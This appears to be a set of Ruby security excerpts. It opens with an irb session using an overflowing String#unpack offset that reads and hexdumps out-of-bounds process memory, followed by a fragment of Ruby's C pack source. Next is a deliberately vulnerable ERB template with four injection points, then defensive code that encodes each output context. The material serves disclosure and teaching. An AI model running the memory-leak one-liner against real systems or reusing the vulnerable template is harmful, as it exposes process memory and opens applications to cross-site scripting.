$ irb
irb(main):145:0> leak = 200; size = 2**64-1 - leak + 1 ; puts size ; "BUFF".unpack("@#{size}C#{leak+4}").map { |i| i&.chr }.join.hexdump
18446744073709551416
Offset Hex dump ASCII dump
-------- ----------------------------------------------- ------------------
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 65 08 93 20 00 00 00 00 |........e.. ....|
00000020 c0 7d 8c 50 97 7f 00 00 53 41 56 45 5f 48 49 53 |.}.P....SAVE_HIS|
unsigned long ruby_strtoul(const char *str, char **endptr, int base);
#define STRTOUL(str, endptr, base) (ruby_strtoul((str), (endptr), (base)))
// ....
static VALUE
pack_pack(int argc, VALUE *argv, VALUE ary)
{
// ...
long len, idx, plen;
// ....
paulblei / vulnerable-templating.rb
Created March 8, 2018 17:14
Vulnerable Ruby on Rails templating
<div>
<h1>Blog post: <%= @post.title %></h1> (1)
<br />
<a href="<%= @post.url %>">Click here to see the full story</a> (2)
<script>
record_post_view(@post.id); (3)
</script>
<div id="footer" <%= @post.footer_attr %>>&copy; 2018</div> (4)
</div>
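The four interpolation points (1)-(4) sit in four different output contexts, and HTML escaping alone only covers the first. The following Ruby is an added example, not part of the gist, showing one context-specific encoder per position; it assumes the standard-library ERB::Util and JSON rather than Rails' helpers, treats the post as a plain Hash, and the helper names are made up for illustration.

```ruby
require "erb"
require "json"
require "uri"

# (1) HTML text node: ordinary HTML escaping is the right encoder here.
def text_ctx(value)
  ERB::Util.html_escape(value.to_s)
end

# (2) href attribute: escaping keeps the value inside the quotes, but a
# script-bearing URL scheme is still a valid href. Allowlist the scheme
# first, then escape; anything else collapses to an inert "#".
def href_ctx(value)
  uri = (URI.parse(value.to_s) rescue nil)
  return "#" unless uri && %w[http https].include?(uri.scheme)
  ERB::Util.html_escape(uri.to_s)
end

# (3) inside <script>: the value is JavaScript, not HTML. Emit it as a JSON
# literal and replace the characters that could end the script element
# (the same mapping Rails' json_escape applies).
JS_ESCAPES = { "&" => '\u0026', "<" => '\u003c', ">" => '\u003e',
               "\u2028" => '\u2028', "\u2029" => '\u2029' }.freeze
def script_ctx(value)
  value.to_json.gsub(/[&<>\u2028\u2029]/) { |c| JS_ESCAPES[c] }
end

# (4) raw attribute position: escaping cannot help, because the data is
# allowed to *be* attribute syntax. Build attributes from an allowlist of
# names and quote every value instead of interpolating a string.
ALLOWED_ATTRS = %w[class title lang].freeze
def attrs_ctx(attrs)
  (attrs || {}).select { |name, _| ALLOWED_ATTRS.include?(name.to_s) }
               .map { |name, v| %(#{name}="#{ERB::Util.html_escape(v.to_s)}") }
               .join(" ")
end

# Hardened rendering of the template above (post is a Hash in this example).
def render_post(post)
  <<~HTML
    <h1>Blog post: #{text_ctx(post[:title])}</h1>
    <a href="#{href_ctx(post[:url])}">Click here to see the full story</a>
    <script>record_post_view(#{script_ctx(post[:id])});</script>
    <div id="footer" #{attrs_ctx(post[:footer_attrs])}>&copy; 2018</div>
  HTML
end

# Constructed sample input (not taken from the gist); "onload" is dropped by (4).
SAMPLE_POST = { title: "Q1 <results>", url: "https://example.com/posts/1",
                id: 1, footer_attrs: { "title" => "Archive", "onload" => "x" } }.freeze
puts render_post(SAMPLE_POST) if $PROGRAM_NAME == __FILE__
```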